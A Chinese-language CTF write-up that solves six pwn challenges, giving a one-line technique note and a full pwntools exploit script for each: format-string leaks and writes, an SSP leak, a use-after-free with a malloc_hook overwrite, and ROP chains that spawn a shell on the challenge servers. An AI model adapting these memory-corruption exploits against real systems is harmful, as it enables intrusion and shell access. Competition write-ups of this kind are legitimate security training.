周六的时候会学校,周日打了一天,难度相对来说较为简单。

送你一朵小红花

部分覆盖返回地址跳到后门就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('xhh')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./xhh')

else:
p = remote(ip,port)
#gdb.attach(p)
p.send("a"*16+ "\xe1\x14")
p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',36231,0)

easystack

头一回碰到这个知识点还是,SSP(Stack Smashing Protector) leak
简单来说就是覆盖___stack_chk_fail(触发canary调用函数)参数来实现任意地址leak。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# -*- coding: utf-8 -*
from pwn import *
from ctypes import *

context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('easystack')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./easystack')

else:
p = remote(ip,port)
#gdb.attach(p,"b *0x400A4D")
p.sendline(p64(0x6CDE20)*100)
p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',39828,0)

scmt

利用格式化字符串泄露随机值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# -*- coding: utf-8 -*
from pwn import *
from ctypes import *

context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('scmt')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./scmt')

else:
p = remote(ip,port)
#gdb.attach(p,"b *0x400B32")
p.sendlineafter("your name:\n",'%8$p')
p.recvuntil("0x")
num = int(p.recv(6),16)
p.sendlineafter("lucky number:\n",str(num))
p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',38253,0)

sooooeasy

UAF,没有leak函数,通过更改IO_stdout来leaklibc,然后打malloc_hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('sooooeasy')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./sooooeasy')

else:
p = remote(ip,port)
def add(size,name,message):
p.sendlineafter("Your choice : ",'1')
p.sendlineafter("size of the your name: \n",str(size))
p.sendafter("Your name:\n",name)
p.sendlineafter("Your message:\n",message)
def free(index):
p.sendlineafter("Your choice : ",'2')
p.sendlineafter("mumber's index:\n",str(index))
def add2(size,name,message):
p.sendlineafter("Your choice : ",'1')
p.sendlineafter("size of the your name: ",str(size))
p.sendafter("Your name:",name)
p.sendlineafter("Your message:",message)
def free2(index):
p.sendlineafter("Your choice : ",'2')
p.sendlineafter("mumber's index:",str(index))
add(0x90,'star','ss')#0
add(0x90,'star','ss')#1
add(0x60,'star','ss') #2
add(0x60,'star','ss') #3
free(1)
add(0x68,'\xdd\x45','ss')#4
free(3)
free(2)
free(3)
add(0x68,'\x30','ss')#5
add(0x68,'\x30','ss')#6
add(0x68,'\x30','ss')#7
add(0x68,'\x30','ss')#8
#--------leak libc --- # 9
p.sendlineafter("Your choice : ",'1')
p.sendlineafter("size of the your name: \n",str(104))
p.sendafter("Your name:\n",'A'*0x33 + p64(0xfbad1800) + p64(0)*3 + '\x00')
p.recv(0x40)
libc_addr = u64(p.recv(6).ljust(8,"\x00"))-(0x7f73fba74600-0x7f73fb6af000)
print "libc= ",hex(libc_addr)
free_hook = libc_addr + (0x7f73fba757a8 - 0x7f73fb6af000)
malloc_hook = libc_addr + (0x7f73fba73b10 - 0x7f73fb6af000)
system_addr = libc_addr + (0x7f73fb6f43a0 - 0x7f73fb6af000)
realloc_addr = libc_addr + 0x84710
one_ge = [0x45226,0x4527a,0xf0364,0xf1207]
p.sendlineafter("Your message:",'ss')
free2(3)
free2(2)
free2(3)
add2(0x68,p64(malloc_hook - 0x23),'ss')#a
add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[0]),'ss') #b
add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[0]),'ss') #c
add2(0x68,'b'*0xb +p64(libc_addr+one_ge[3]) + p64(realloc_addr+4),'ss') #d
#add2(0x68,'b'*0x13 + p64(libc_addr+one_ge[2]),'ss') #c
#---shell e
#gdb.attach(p)
pause()
print "libc= ",hex(realloc_addr)
p.sendlineafter("Your choice : ",'1')

p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',38870,0)

easypwn

7字节格式化字符串,覆盖rbp最低位为’\x00’,一定概率将rbp指向可输入空间,然后利用之前两次输入在栈上布置好rop。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('easypwn')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./easypwn')

else:
p = remote(ip,port)
#gdb.attach(p,"b *0x400b7f")
#gdb.attach(p,"b *0x400940")
pop_rdi_ret = 0x400be3
pop_rsi_r15_ret = 0x400be1
leave_ret = 0x400a1f
ret = 0x4006ae
pop_rbp_ret = 0x4007c8
payload = p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(0x602080+0x300)+p64(0)+p64(0x400730)
payload += p64(pop_rbp_ret)+p64(0x602080+0x300-8)+p64(leave_ret)
p.sendafter("teamname: ",payload)
payload = "%22$hhn"
p.sendafter("input your name\n",payload)
payload = p64(ret)*3+p64(pop_rdi_ret)+p64(0x602030)+p64(0x4006C0)+p64(0x400BD6)
p.sendafter("introduction\n",payload)
p.recv(4)
printf_addr = u64(p.recv(6).ljust(8,"\x00"))
p.recv(1)
libc = ELF("/home/starssgo/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6")
libcbase_addr = printf_addr - libc.symbols["printf"]
print "libcbase_addr = ",hex(libcbase_addr)
system_addr = libcbase_addr + libc.symbols["system"]
binsh_addr = libcbase_addr + libc.search("/bin/sh\x00").next()
p.sendline(p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))
p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',31982,0)

superpower

读取/proc/self/syscall来泄露stack地址,然后利用格式化字符串修改返回地址控制程序流程。
代码比较乱,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# -*- coding: utf-8 -*
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('superpower')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./superpower')

else:
p = remote(ip,port)
#gdb.attach(p,'b *0x80487B3')#0x80487dc
p.sendlineafter("filename:","/proc/self/syscall")#1063 = ret 0x804864B 27
p.recvuntil("0xff")
p.recvuntil("0xff")
p.recvuntil("0xff")
stack_addr = int("ff" + p.recv(6),16)
p.recvuntil("0xf7")
libc_addr = int("f7" + p.recv(6),16)
print "stack_addr = ",hex(stack_addr)
print "libc_addr = " ,hex(libc_addr)
libcbase_addr = libc_addr - (0xf7f70fd9-0xf7d98000)
return_addr = stack_addr + 0x11c4 # 42
print "return_addr = ",hex(return_addr)
#pause()
payload = ("%1067$p%2042c%53$hn%32327c%54$hn").ljust(80,"\x00")
payload += "/proc/self/syscall".ljust(24,"\x00")
payload += p32(return_addr+2)+p32(return_addr)

p.sendlineafter("what's you name?",payload)
p.recvuntil("0x")
libcbase_addr = int(p.recv(8),16)-(0xf7dd9647-0xf7dc1000)
libc = ELF("libc.so")
system_addr = libcbase_addr+libc.symbols["execve"]
binsh_addr = libcbase_addr+libc.search("/bin/sh\x00").next()
system_0_2 = system_addr&0xffff
system_2_4 = (system_addr>>16)&0xffff
binsh_0_2 = binsh_addr&0xffff
binsh_2_4 = (binsh_addr>>16)&0xffff
print "system_addr = ",hex(system_addr)
print "binsh_addr = ",hex(binsh_addr)
print "system_0_2 = ",hex(system_0_2)
print "system_2_4 = ",hex(system_2_4)
print "binsh_0_2 = ",hex(binsh_0_2)
print "binsh_2_4 = ",hex(binsh_2_4)
pause()
#gdb.attach(p,"b *0x80487dc")
p.sendlineafter("filename:","/proc/self/syscall")
p.recvuntil("0xff")
p.recvuntil("0xff")
p.recvuntil("0xff")
stack_addr = int("ff" + p.recv(6),16)#53
return_addr = stack_addr + 0x11c4-0xc
payload = ("%57$n%58$n"+"%"+str(binsh_0_2)+"c%53$hn"+"%"+str(system_0_2-binsh_0_2)+"c%54$hn"+"%"+str(system_2_4-system_0_2)+"c%55$hn"+"%"+str(binsh_2_4-system_2_4)+"c%56$hn").ljust(80,"\x00")
payload += "/proc/self/syscall".ljust(24,"\x00")
payload += p32(return_addr+8)+p32(return_addr)
payload += p32(return_addr+2)+p32(return_addr+10)
payload += p32(return_addr+12)+p32(return_addr+16)
#payload = ("%2052c%53$hn%32327c%54$hn").ljust(80,"\x00")
#payload += "/proc/self/syscall".ljust(24,"\x00")
#payload += p32(return_addr+2)+p32(return_addr)
p.sendlineafter("what's you name?",payload)
p.interactive()
if __name__ == '__main__':
pwn('node2.hackingfor.fun',32091,0)

总结

好久没打比赛了,做的太慢了。阿西吧。